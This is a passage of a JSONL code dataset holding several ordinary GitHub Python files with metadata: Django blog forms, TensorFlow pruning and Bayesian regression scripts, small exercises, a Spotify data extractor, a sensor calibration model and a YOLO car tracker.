PostForm(forms.ModelForm):\n # Include the category field with a ModelChoiceField\n category = forms.ModelChoiceField(queryset=Category.objects.all(), required=False)\n\n # Define the meta class for the PostForm\n class Meta:\n # Specify the model to use (Post)\n model = Post\n # Specify the fields to include in the form\n fields = ['title', 'header_image', 'content', 'category']\n\n # Define the widgets for each field\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control', 'placeholder': \"this is the title\"}),\n 'header_image': ClearableFileInput(attrs={'class': 'form-control'}),\n 'content': forms.Textarea(attrs={'class': 'form-control', 'placeholder': 'This is where you can post your content'}),\n 'category': forms.Select(choices=choices_list, attrs={'class': 'form-control'})\n }\n\n# Create a form for updating existing posts, inheriting from forms.ModelForm\nclass UpdateForm(forms.ModelForm):\n # Include the category field with a ModelChoiceField\n category = forms.ModelChoiceField(queryset=Category.objects.all(), required=False)\n\n # Define the meta class for the UpdateForm\n class Meta:\n # Specify the model to use (Post)\n model = Post\n # Specify the fields to include in the form\n fields = ['title', 'header_image', 'content', 'category']\n\n # Define the widgets for each field\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control', 'placeholder': \"this is the title\"}),\n 'header_image': ClearableFileInput(attrs={'class': 'form-control'}),\n 'content': forms.Textarea(attrs={'class': 'form-control', 'placeholder': 'This is where you can post your content'}),\n 'category': forms.Select(choices=choices_list, attrs={'class': 'form-control'})\n }\n\n# Create a form for adding comments, inheriting from forms.ModelForm\nclass CommentForm(forms.ModelForm):\n # Define the meta class for the CommentForm\n class Meta:\n # Specify the model to use (Comment)\n model = Comment\n # Specify the fields to include in the form\n fields = ['name', 'body']\n\n # Define the widgets for each field\n widgets = {\n 'name': forms.TextInput(attrs={'placeholder': 'Your name'}),\n 'body': forms.Textarea(attrs={'placeholder': 'Leave a comment'}),\n }\n","repo_name":"dh646956164/Django_Blog","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73496027393","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport time\nimport os\nimport cv2\nfrom datetime import datetime\n\nfrom model_only import fcn\nfrom debug_functions import plot_weight_dist, print_inference\nfrom prune_network import prune_layers, check_pruned_weights, print_pruned_weights\nfrom tqdm import tqdm\n\nNUM_CLASS = 10\nMAX_STEPS = [30000, 30000, 30000, 30000, 30000, 30000]\nLOG_FREQUENCY = None\nBATCH_SIZE = 64\nLEARNING_RATE = 0.001\nMODEL_SAVING_FREQUENCY = None\nTRAIN_DIR = './checkpoints/train/'\nLOGS_DIR = './tensorboard/logs/'\nwhite_list = []# ['fcn/conv5/bias:0', 'fcn/norm5/gamma:0', 'fcn/norm5/beta:0']\nwhite_regex = []# ['bias', 'gamma', 'beta']\nskip_first = True # if True, will skip the first cycle of training and prune the network before training begins.\n\n# NOTE: python prune_train.py 2>&1 | tee logs.txt\n# python prune_train.py 2>>&1 | tee logs.txt <-- if you want to append to previous log file\n\ndef data_loader(dir):\n ldDict ={}\n with open(dir+'labels.txt', 'r') as f:\n lines = f.readlines()\n for cid, line in enumerate(lines):\n labelname=line.split('\\n')[0]\n ldDict[labelname] = cid\n trainSet= load_data(os.path.join(dir, 'train/'), ldDict)\n testSet = load_data(os.path.join(dir, 'test/'), ldDict)\n return trainSet, testSet, list(ldDict.keys())\n\n\ndef load_data(dirname, ldDict):\n data=[]\n labels=[]\n files = os.listdir(dirname)\n for filename in tqdm(files, desc=dirname):\n img = cv2.imread(dirname+filename)\n labelname = filename.split('.')[0].split('_')[1]\n cid = ldDict[labelname]\n data.append(img)\n labels.append(cid)\n dataSet = (np.asarray(data)/255.0).astype(np.float32)\n labels = np.asarray(labels)\n trainSet = {'data':dataSet,'labels':labels}\n return trainSet\n\n\ndef sample_batch(dataset, batch_size):\n N = dataset['data'].shape[0]\n indices = np.random.randint(N, size=batch_size)\n return {key: dataset[key][indices] for key in dataset}\n\n\ndef main():\n # grad mask dict placeholder\n grad_mask_consts = None\n\n # load data\n print(\"Loading datasets...\")\n trainSet, testSet, labelNames = data_loader('./dataset/cifar/')\n print(\"Dataset loading complete.\")\n\n # reset default graph\n tf.reset_default_graph()\n\n global_step = tf.train.get_or_create_global_step()\n\n # define optimizer\n opt = tf.train.GradientDescentOptimizer(\n learning_rate=LEARNING_RATE,\n # beta1=0.9,\n # beta2=0.999,\n # epsilon=1e-08,\n use_locking=False,\n name='GD'\n )\n\n images = tf.placeholder(name='images', dtype=tf.float32, shape=[None, 32, 32, 3])\n fine_labels = tf.placeholder(name='fine_labels', dtype=tf.int32, shape=[None])\n\n logits = fcn(images, is_training=True)\n # probs = tf.nn.softmax(logits)\n # pred = tf.cast(tf.argmax(logits, axis=1), tf.int32)\n\n # loss metrics:\n loss = tf.losses.softmax_cross_entropy(tf.one_hot(fine_labels, NUM_CLASS), logits)\n training_loss = tf.summary.scalar(\"training_loss\", loss)\n validation_loss = tf.summary.scalar(\"validation_loss\", loss)\n\n # accuracy metrics:\n top_1 = tf.cast(tf.equal(tf.cast(tf.argmax(logits, 1), tf.int32), fine_labels), tf.float32)\n accuracy = tf.reduce_mean(top_1)\n training_accuracy = tf.summary.scalar(\"training_accuracy\", accuracy)\n validation_accuracy = tf.summary.scalar(\"validation_accuracy\", accuracy)\n\n top_5 = tf.reduce_sum(tf.cast(tf.equal(tf.nn.top_k(logits, k=5, sorted=True)[1],\n tf.expand_dims(fine_labels, 1)), tf.float32), axis=1)\n top_5_accuracy = tf.reduce_mean(top_5)\n\n # init summary writer:\n writer = tf.summary.FileWriter(LOGS_DIR)\n\n step_ = 0\n for it in range(len(MAX_STEPS)):\n\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n if grad_mask_consts is not None:\n # Get all trainable parameters\n vars = tf.trainable_variables(scope='fcn')\n\n # Compute the gradients for a list of variables.\n train_grads = opt.compute_gradients(loss, vars)\n\n # Apply mask. orig_grads_and_vars is a list of tuples (gradient, variable).\n pruned_train_gradient = [\n (tf.multiply(tf.cast(grad_mask_consts[gv[1].name], tf.float32), gv[0]), gv[1]) for gv in train_grads]\n\n # Ask the optimizer to apply the masked gradients.\n train_op = opt.apply_gradients(pruned_train_gradient, global_step=global_step)\n else:\n train_op = opt.minimize(loss, global_step=global_step)\n\n # training setups\n saver = tf.train.Saver(max_to_keep=100)\n\n # Build an initialization operation to run below.\n init = tf.global_variables_initializer()\n\n # Start running operations on the Graph.\n sess = tf.Session(\n config=tf.ConfigProto(\n allow_soft_placement=True,\n )\n )\n sess.run(init)\n\n # try to load pre-trained models\n if tf.train.get_checkpoint_state(TRAIN_DIR) is not None:\n restorer = tf.train.Saver()\n restorer.restore(sess, tf.train.latest_checkpoint(TRAIN_DIR))\n print('%s: Pre-trained model restored from %s' %\n (datetime.now(), TRAIN_DIR))\n\n ################################################################################################################\n # Train the network\n if (it == 0 and not skip_first) or it > 0:\n # main loop\n for step in range(MAX_STEPS[it]):\n ############################################################################################################\n start_time = time.time()\n\n ############################################################################################################\n # training set\n # prepare data\n train_batch = sample_batch(trainSet, BATCH_SIZE)\n # feed dict\n feed_dict = {\n images: train_batch['data'],\n fine_labels: train_batch['labels'],\n }\n _, loss_value, train_loss, accuracy_value, train_acc, global_step_value = sess.run([train_op,\n loss, training_loss,\n accuracy, training_accuracy,\n global_step],\n feed_dict=feed_dict)\n writer.add_summary(train_acc, step_)\n writer.add_summary(train_loss, step_)\n\n ############################################################################################################\n # test set\n # prepare data\n test_batch = sample_batch(testSet, BATCH_SIZE)\n # feed dict\n feed_dict = {\n images: test_batch['data'],\n fine_labels: test_batch['labels'],\n }\n valid_accuracy_value, valid_acc, valid_loss_value, valid_loss = sess.run([accuracy, validation_accuracy,\n loss, validation_loss],\n feed_dict=feed_dict)\n writer.add_summary(valid_acc, step_)\n writer.add_summary(valid_loss, step_)\n\n duration = time.time() - start_time\n assert not np.isnan(loss_value), 'Model diverged with loss = NaN'\n ############################################################################################################\n\n # log\n if (LOG_FREQUENCY is not None and step % LOG_FREQUENCY == 0) or (step + 1) == MAX_STEPS[it]:\n num_examples_per_step = BATCH_SIZE\n examples_per_sec = num_examples_per_step / duration\n sec_per_batch = duration\n format_str = (\n '%s: step %d, examples %d, loss = %.9f accuracy = %.4f (%.3f examples/sec; %.3f sec/batch)'\n )\n print(\n format_str % (\n datetime.now(), step, BATCH_SIZE * step,\n loss_value,\n accuracy_value,\n examples_per_sec, sec_per_batch\n )\n )\n\n # Save the model checkpoint periodically\n if (MODEL_SAVING_FREQUENCY is not None and step % MODEL_SAVING_FREQUENCY == 0) or (step + 1) == MAX_STEPS[it]:\n checkpoint_path = os.path.join(TRAIN_DIR, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=int(global_step_value))\n\n step_ += 1\n\n ################################################################################################################\n # Inference measurement:\n inf_accuracy, inf_top_5, inf_loss = print_inference(sess, testSet, images, fine_labels, accuracy, top_5_accuracy, loss, it)\n print('>>>\\tInference top_1 acc BEFORE pruning, it_{}: {}'.format(it, inf_accuracy))\n print('>>>\\tInference top_5 acc BEFORE pruning, it_{}: {}'.format(it, inf_top_5))\n\n ################################################################################################################\n # Pruning step:\n plot_weight_dist(sess, bins=200, title='Weight distribution before pruning, iteration {}'.format(it),\n fig_name='before_it{}'.format(it), verbose=False, zero_mask=it > 0)\n\n grad_mask_consts, global_step_value = prune_layers(sess, global_step, grad_mask_consts, white_list, white_regex)\n check_pruned_weights(sess, grad_mask_consts, it)\n print_pruned_weights(sess, grad_mask_consts)\n\n plot_weight_dist(sess, bins=200, grad_mask_consts=grad_mask_consts,\n title='Weight distribution after pruning, iteration {}'.format(it),\n fig_name='after_it{}'.format(it), verbose=False)\n\n ################################################################################################################\n # Inference measurement:\n inf_accuracy, inf_top_5, inf_loss = print_inference(sess, testSet, images, fine_labels, accuracy, top_5_accuracy, loss, it)\n print('>>>\\tInference top_1 acc AFTER pruning, it_{}: {}'.format(it, inf_accuracy))\n print('>>>\\tInference top_5 acc AFTER pruning, it_{}: {}'.format(it, inf_top_5))\n\n # Save the model checkpoint periodically\n checkpoint_path = os.path.join(TRAIN_DIR, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=int(global_step_value))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jzharris/ALPR-AIonChip","sub_path":"sandbox/YOLOv2/keras-yolo2/pruning/prune_train.py","file_name":"prune_train.py","file_ext":"py","file_size_in_byte":11351,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6549005647","text":"import tensorflow as tf # for neural networks\nimport numpy as np # for numerical operations\nimport tensorflow_probability as tfp # for Bayesian neural networks\nfrom tensorflow_probability import distributions as tfd # for distributions\n\n__all__ = [\n \"probabilistic_variational_model\",\n \"compute_kl_divs\",\n \"black_box\"\n]\n\n\ndef neg_log_likelihood(x, rv_x):\n \"\"\"Negative log likelihood of the data under the distribution.\"\"\"\n return -rv_x.log_prob(x)\n\n\n# Specify the surrogate posterior over `keras.layers.Dense` `kernel` and `bias`.\ndef posterior_mean_field(kernel_size, bias_size=0, dtype=None):\n n = kernel_size + bias_size\n c = np.log(np.expm1(1.0))\n return tf.keras.Sequential(\n [\n tfp.layers.VariableLayer(\n 2 * n,\n dtype=dtype,\n initializer=lambda shape, dtype: random_gaussian_initializer(\n shape, dtype\n ),\n trainable=True,\n ),\n # tfp.layers.VariableLayer(2 * n, dtype=dtype),\n tfp.layers.DistributionLambda(\n lambda t: tfd.Independent(\n tfd.Normal(\n loc=t[..., :n],\n scale=1e-5 + 1e-2 * tf.nn.softplus(c + t[..., n:]),\n # softplus ensures positivity and avoids numerical instability\n ),\n reinterpreted_batch_ndims=1, # each weight is independent\n ) # reinterpreted_batch_ndims=1 means that the last dimension is the event dimension\n ),\n ]\n )\n\n\n# Specify the prior over `keras.layers.Dense` `kernel` and `bias`.\ndef prior_trainable(kernel_size, bias_size=0, dtype=None):\n n = kernel_size + bias_size\n return tf.keras.Sequential(\n [\n tfp.layers.VariableLayer(n, dtype=dtype),\n tfp.layers.DistributionLambda(\n lambda t: tfd.Independent(\n tfd.Normal(loc=t, scale=1), reinterpreted_batch_ndims=1\n )\n ),\n ]\n )\n\n\ndef random_gaussian_initializer(shape, dtype=\"float32\"):\n n = int(shape / 2)\n loc_norm = tf.random_normal_initializer(mean=0.0, stddev=0.1)\n loc = tf.Variable(initial_value=loc_norm(shape=(n,), dtype=dtype))\n scale_norm = tf.random_normal_initializer(mean=-3.0, stddev=0.1)\n scale = tf.Variable(initial_value=scale_norm(shape=(n,), dtype=dtype))\n return tf.concat([loc, scale], 0)\n\n\ndef probabilistic_variational_model(\n input_shape: tuple,\n output_shape: tuple,\n learn_r: float = 0.001,\n num_components: int = 1,\n):\n \"\"\"\n Probabilistic variational model for regression.\n :param input_shape: tuple, shape of the input data\n :param output_shape: tuple, shape of the output data\n :param learn_r: float, learning rate\n :param num_components: int, number of components in the mixture model\n :return: tf.keras.Sequential, probabilistic variational model\n \"\"\"\n params_size = tfp.layers.MixtureNormal.params_size(num_components, output_shape[-1]) # Number of parameters\n kl_weight = 1 / input_shape[0] # Weight for the KL divergence\n model = tf.keras.Sequential(\n [\n tf.keras.layers.InputLayer(input_shape=(input_shape[1], input_shape[2])), # Input layer\n tf.keras.layers.Conv1D(\n filters=4,\n kernel_size=2,\n padding=\"same\",\n kernel_initializer=tf.keras.initializers.Zeros(),\n ),\n tf.keras.layers.MaxPool1D(pool_size=2), # Pooling layer\n tf.keras.layers.Conv1D(\n filters=8,\n kernel_size=2,\n padding=\"same\",\n kernel_initializer=tf.keras.initializers.Zeros(),\n ),\n tf.keras.layers.MaxPool1D(pool_size=2), # Pooling layer\n tf.keras.layers.Flatten(),\n tfp.layers.DenseVariational(\n units=20,\n make_prior_fn=prior_trainable,\n make_posterior_fn=posterior_mean_field,\n kl_weight=kl_weight,\n kl_use_exact=True,\n name=\"var1\",\n activation=\"relu\",\n ), # Hidden layer 1\n tf.keras.layers.Dropout(0.3),\n tf.keras.layers.Dense(params_size), # Hidden layer 2\n tfp.layers.MixtureNormal(num_components, output_shape[-1]), # Mixture layer\n ],\n name=\"model\",\n )\n optimizer = tf.keras.optimizers.Adam(learning_rate=learn_r) # Optimizer\n model.compile(optimizer=optimizer, loss=neg_log_likelihood) # Compile model with loss and optimizer\n\n return model\n\n\n@tf.function\ndef compute_kl_divs(y_true, y_pred):\n ideal_dist = tfp.distributions.Normal(loc=y_true, scale=0.1)\n predicted_dist = tfp.distributions.Normal(loc=y_pred.mean(), scale=y_pred.stddev())\n return tfp.distributions.kl_divergence(ideal_dist, predicted_dist)\n\n\ndef black_box(X, y):\n # Let's now create a model.\n # You just need to specify the input and output shapes.\n model = probabilistic_variational_model(input_shape=X.shape,\n output_shape=y.shape,\n learn_r=0.001,)\n\n # Let's now train the model.\n # You can specify the number of epochs and the batch size.\n # define an early stopping callback\n early_stopping = tf.keras.callbacks.EarlyStopping(\n monitor=\"val_loss\",\n patience=10, # number of epochs with no improvement after which training will be stopped\n restore_best_weights=True, # restore the best model\n )\n\n # fit the model\n history = model.fit(\n X,\n y,\n epochs=500, # number of epochs - one epoch is one iteration over the entire training set\n batch_size=32, # batch size - number of samples per gradient update\n verbose=1, # verbose mode - 0: silent, 1: not silent\n validation_split=0.2, # validation split - 20% of the training data will be used for validation\n callbacks=[early_stopping], # early stopping - stop training when the validation loss is not decreasing\n # anymore\n )\n\n return model, history\n","repo_name":"robinthibaut/BASIL_Workshop_ILVO","sub_path":"basil/functions/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":6226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30276134447","text":"\"\"\"\n文件和异常\n实际开发中常常会遇到对数据进行持久化操作的场景,而实现数据持久化最直接简单的方式就是将数据保存到文件中\n\"\"\"\nimport time\n\n\"\"\"\n读取文本文件时,需要在使用open函数时指定好带路径的文件名(相对路径或绝对路径)并将文件模式设置为'r'\n然后通过encoding参数指定编码,如果不能保证保存文件时使用的编码方式与encoding参数指定的编码方式是一致的\n那么就可能因无法解码字符而导致读取失败\n\"\"\"\n\n\n# 当文件不存在时,捕获异常\ndef main():\n f = None\n try:\n f = open('/Day 17 - Files and Exceptions//Info.txt', 'r', encoding='utf-8')\n print(f.read())\n except FileNotFoundError:\n print('无法打开指定的文件!')\n except LookupError:\n print('指定了未知的编码!')\n except UnicodeDecodeError:\n print('读取文件时解码错误!')\n finally:\n if f:\n f.close()\n\n\nif __name__ == '__main__':\n main()\n print()\n\n\n\n\n","repo_name":"Bobby981229/Python-Learning","sub_path":"Day 17 - Files and Exceptions/Files_Exceptions.py","file_name":"Files_Exceptions.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"44407288180","text":"#You are given an array coordinates, coordinates[i] = [x, y], where [x, y] represents the coordinate of a point. Check if these points make a straight line in the XY plane.\r\n#\r\n# \r\n#\r\n# \r\n#\r\n#Example 1:\r\n#\r\n#\r\n#\r\n#Input: coordinates = [[1,2],[2,3],[3,4],[4,5],[5,6],[6,7]]\r\n#Output: true\r\n#Example 2:\r\n#\r\n#\r\n#\r\n#Input: coordinates = [[1,1],[2,2],[3,4],[4,5],[5,6],[7,7]]\r\n#Output: false\r\n# \r\n#\r\n#Constraints:\r\n#\r\n#2 <= coordinates.length <= 1000\r\n#coordinates[i].length == 2\r\n#-10^4 <= coordinates[i][0], coordinates[i][1] <= 10^4\r\n#coordinates contains no duplicate point.\r\n\r\nclass Solution(object):\r\n def checkStraightLine(self, coordinates): \r\n if len(coordinates) < 3: \r\n return True\r\n\r\n x_diff = coordinates[1][0] - coordinates[0][0] \r\n y_diff = coordinates[1][1] - coordinates[0][1]\r\n\r\n for x, y in coordinates[2:]:\r\n dx = x - coordinates[0][0]\r\n dy = y - coordinates[0][1]\r\n if x_diff * dy != y_diff * dx:\r\n return False\r\n\r\n return True","repo_name":"nileshpaliwal/May-Leetcoding-Challenge-2020","sub_path":"Check If It Is a Straight Line.py","file_name":"Check If It Is a Straight Line.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26325576239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 27 10:30 2020\n\n@author: fdbfvuie\n\"\"\"\n\nn = int(input())\nfor i in range(n):\n a = [int(j) for j in input().split(\" \")]\n noPark = True\n \n for j in range(a[0] + 1, a[1], 1):\n if j % a[2] != 0:\n print(j, end=\" \")\n noPark = False\n\n if noPark:\n print(\"No free parking spaces.\", end = \"\")\n print()","repo_name":"fjfhfjfjgishbrk/AE401-Python","sub_path":"zerojudge/e621.py","file_name":"e621.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15695869136","text":"import datetime\nimport pandas as pd\nimport requests\n\nCOLUMNS = [\"song_name\", \"artist_name\", \"played_at\", \"time_stamp\"]\n\n\ndef get_headers(token: str) -> dict:\n return {\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {token}\".format(token=token),\n }\n\n\ndef get_time_stamp(day: int = 1) -> int:\n start_date = datetime.datetime.now() - datetime.timedelta(days=day)\n return int(start_date.timestamp()) * 1000\n\n\ndef get_response(headers: dict, url: str, time_stamp: int) -> requests.Response:\n return requests.get(\n url=f\"{url}{time_stamp}\",\n headers=headers,\n )\n\n\ndef get_data_dict(res: requests.Response) -> dict:\n data = res.json()\n song_names = []\n artist_names = []\n played_at_list = []\n timestamps = []\n\n for song in data[\"items\"]:\n song_names.append(song[\"track\"][\"name\"])\n artist_names.append(song[\"track\"][\"album\"][\"artists\"][0][\"name\"])\n played_at_list.append(song[\"played_at\"])\n timestamps.append(song[\"played_at\"][0:10])\n\n return {\n \"song_name\": song_names,\n \"artist_name\": artist_names,\n \"played_at\": played_at_list,\n \"time_stamp\": timestamps,\n }\n\n\ndef extract(token: str, url: str) -> pd.DataFrame:\n headers = get_headers(token=token)\n\n time_stamp = get_time_stamp()\n\n res = get_response(headers=headers, url=url, time_stamp=time_stamp)\n\n song_dict = get_data_dict(res)\n\n return pd.DataFrame(song_dict, columns=COLUMNS)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"pqtrng/spotify","sub_path":"app/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39940836512","text":"\"\"\" Infrared 3 Probability Sensor Model (PSM) Code for ENMT482 assignment - Part A. \"\"\"\n\n###################################################################################################\n\n\"\"\" Code setup. \"\"\"\n\n# Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import loadtxt, ones, zeros, linspace\nfrom numpy.linalg import lstsq\n\n###################################################################################################\n\ndef model_h_x(x, k):\n return k[0] + k[1]/ (x + k[2]) \n\ndef model_dh_x(x, k):\n return - k[1]/(x + k[2])**2\n\ndef model_nonlinear_least_squares_fit(x, z, iterations=5):\n \n N = len(z)\n A = ones((N, 3))\n k = zeros(3)\n \n for i in range(iterations):\n # Calculate Jacobians for current estimate of parameters.\n for n in range(N):\n A[n, 1] = 1 / (x[n] + k[2])\n A[n, 2] = -k[1] / (x[n] + k[2])**2\n \n # Use least squares to estimate the parameters.\n deltak, res, rank, s = lstsq(A, z - model_h_x(x, k))\n k += deltak\n\n return k\n\n\n###################################################################################################\n\ndef linear_ML_IR(k, z, x0, var_V):\n\n h_x = model_h_x(x0, k)\n dh_x = model_dh_x(x0, k)\n x_hat = (z - h_x) / dh_x + x0\n\n var_x_hat = var_V/(dh_x)**2\n return x_hat, var_x_hat\n\ndef mean(Z_meas, h_x):\n mean_V = sum(np.array(Z_meas) - np.array(h_x)) / len(h_x) \n return mean_V\n\ndef variance(mean_V, V_noise):\n var_IR3_array = []\n\n for val in V_noise:\n var_IR3_array.append((val - mean_V) ** 2)\n\n\n var_V = sum(var_IR3_array) / len(var_IR3_array)\n return var_V\n\ndef PDF(var_V, mean_V):\n \"\"\" Work out the PDF's (mean and variance). \"\"\"\n # Determine likelihoods.\n #print(\"{}:{}\\n\".format(mean_V,var_V))\n\n f_v_IR3 = []\n x_array = linspace(-5,5,400)\n for val in x_array:\n f_v_IR3.append((1 / (2 * np.pi * var_V)) * np.exp((-1/2) * ((val - mean_V) ** 2) / (var_V)))\n\n return f_v_IR3\n \n\ndef filter_outliers(V_vector):\n #using the Iglewics and Hoaglin's modified Z-score. This method requires a model for it to be performed.\n #The function requires the error vector and the median of the error.\n V_vector.sort()\n median = V_vector[(len(V_vector))/2]\n \n pass\n\n\ndef calibration():\n data = loadtxt('Part A/calibration.csv', delimiter=',', skiprows=1)\n index, time, range_, velocity_command, raw_ir1, raw_ir2, raw_ir3, raw_ir4, sonar1, sonar2 = data.T\n \n Z_meas = raw_ir3[1:758]\n X_state = range_[1:758]\n\n k = model_nonlinear_least_squares_fit(X_state, Z_meas)\n X_array = linspace(0.1,0.8,201)\n h_x = model_h_x(X_state, k)\n h_x_plot = model_h_x(X_array, k)\n\n V_noise = np.array(Z_meas) - np.transpose(np.array(h_x)) \n \n mean_V = mean(Z_meas, h_x)\n var_V = variance(mean_V, V_noise)\n f_v_IR3 = np.transpose(PDF(var_V, mean_V))\n print(var_V, mean_V)\n #for a given measurement z this function will determine where the ML estimate of the next point is, but\n #where do i get my initial guess from? is it form my other sensors?\n x0 = X_state[0]\n N = len(Z_meas)\n X_hat_array = []\n\n \n for n in range(N):\n z = Z_meas[n]\n var_z = V_noise[n]\n x_hat, var_x_hat = linear_ML_IR(k, z, x0, var_V)\n X_hat_array.append(x_hat)\n x0 = range_[n]\n\n z_array = linspace(3.0,0.2, 201)\n\n \n x_array = linspace(-5,5,400)\n\n plt.figure()\n plt.plot(x_array, f_v_IR3)\n plt.xlabel('Voltage')\n plt.ylabel('PDF')\n plt.title('IR3 PDF') \n\n plt.figure()\n plt.scatter(X_state, Z_meas, label='raw data', s=10, c='b', marker='o')\n plt.scatter(X_hat_array, Z_meas, label='taylor series approx', s=15, c='r', marker='o', alpha=0.2)\n plt.plot(X_array, h_x_plot, label='non-linear approx', markersize=10, color='k', linewidth=4)\n plt.legend()\n plt.ylabel('Voltage (V)')\n plt.xlabel('Distance (m)')\n plt.title('$k_1$ = %.3f, $k_2$ = %.3f, $k_3$ = %.3f' % (k[0], k[1], k[2]))\n plt.grid(True)\n\n plt.figure()\n plt.plot(time[1:758], range_[1:758], 'ko', alpha=0.2)\n plt.plot(time[1:758], X_hat_array, 'ro', alpha=0.2)\n plt.ylabel('Distance (m)')\n plt.xlabel('Time (s)')\n #plt.show()\n \n return var_V, k\n #savefig(__file__.replace('.py', '.pgf'), bbox_inches='tight')\n\n\n\ncalibration()","repo_name":"williamjohanson/Autonomous_Robotics","sub_path":"Part A/IR3_PSM.py","file_name":"IR3_PSM.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7845935292","text":"import cv2\nimport numpy as np\nimport time\nimport math\n\nclass EuclideanDistTracker:\n def __init__(self):\n # Store the center positions of the objects\n self.center_points = {}\n # Keep the count of the IDs\n # each time a new object id detected, the count will increase by one\n self.id_count = 1\n\n\n def update(self, objects_rect):\n # Objects boxes and ids\n objects_bbs_ids = []\n\n for rect in objects_rect:\n x, y, w, h, idd = rect\n cx = (x + x + w) // 2\n cy = (y + y + h) // 2\n \n same_object_detected = False\n for id, pt in self.center_points.items():\n dist = math.hypot(cx - pt[0], cy - pt[1])\n\n if dist < 30:\n self.center_points[id] = (cx, cy)\n #print(self.center_points)\n objects_bbs_ids.append([x, y, w, h, id])\n same_object_detected = True\n break\n if(idd == 1):\n # New object is detected we assign the ID to that object\n if same_object_detected is False:\n self.center_points[self.id_count] = (cx, cy)\n objects_bbs_ids.append([x, y, w, h, self.id_count])\n self.id_count += 1\n\n new_center_points = {}\n for obj_bb_id in objects_bbs_ids:\n _, _, _, _, object_id = obj_bb_id\n center = self.center_points[object_id]\n new_center_points[object_id] = center\n\n # Update dictionary with IDs not used removed\n self.center_points = new_center_points.copy()\n return objects_bbs_ids\n\ntracker = EuclideanDistTracker()\nnet = cv2.dnn.readNet(\"yolov3.weights\", \"yolov3_testing.cfg\")\nclasses = [\"car\"]\nlayer_names = net.getLayerNames()\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\nfont = cv2.FONT_HERSHEY_PLAIN\ncap = cv2.VideoCapture(\"DRONE-SURVEILLANCE-CONTEST-VIDEO.mp4\")\nframe_id = 0\ntop_count = 0\nwriter = cv2.VideoWriter('Detected1_result.avi',cv2.VideoWriter_fourcc('M','J','P','G'), 30, (1920,1080))\n\nsuccess = cap.read() \nwhile success:\n # Get frame\n _, frame = cap.read() \n frame_id += 1\n if frame_id % 1 != 0:\n continue\n \n height, width, channels = frame.shape\n # print(height)\n # print(width)\n\n # Detecting objects 00392\n blob = cv2.dnn.blobFromImage(frame, 0.00261, (416, 416), (0, 0, 0), True, crop=False)\n net.setInput(blob)\n \n outs = net.forward(output_layers)\n class_ids = []\n result = []\n confidences = []\n boxes = []\n liste = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.2:\n # Object detected\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n\n # Rectangle coordinates\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n \n if frame_id < 20:\n x1=240\n else:\n x1=350\n y1=600\n \n if x1 < center_y < y1 and w > 20:\n idd=1\n else:\n idd=0\n \n boxes.append([x, y, w, h, idd])\n \n boxes_ids = tracker.update(boxes)\n # print(boxes_ids)\n boxes_ids_list = []\n new_id_list =[]\n \n for i in range(len(boxes_ids)):\n if boxes_ids[i][4] not in boxes_ids_list:\n boxes_ids_list.append(boxes_ids[i][4])\n new_id_list.append(boxes_ids[i])\n for box_id in new_id_list:\n x, y, w, h, id = box_id\n cv2.putText(frame, str(id), (x+3 , y + h-5), cv2.FONT_HERSHEY_PLAIN, 2, (0,0,0), 2)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0,0,255), 3)\n print(new_id_list)\n # cv2.imshow(\"FRAME\",frame)\n\n try:\n _,_,_,_,val = max(new_id_list, key=lambda item: item[4])\n if val > top_count:\n top_count = val\n except:\n pass\n cv2.putText(frame, \"Abdul Mannan\", (905, 90), font, 3, (0, 0, 255), 2)\n cv2.putText(frame, str(top_count), (1800, 90), font, 3, (0, 0, 255), 2)\n\n writer.write(frame) \n cv2.imshow(\"Car Counting\", frame)\n \n k = cv2.waitKey(1) & 0xff \n if k == 27:\n break\n\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"Abdulmannan1122/Drone_car_detector","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38218606927","text":"from typing import List, Tuple, Dict, Optional\nfrom collections import Counter, defaultdict\nimport os\n\nimport numpy as np\nimport pandas as pd\nfrom functools import cache\nfrom umap import UMAP\nimport sounddevice as sd\nfrom sklearn.metrics import 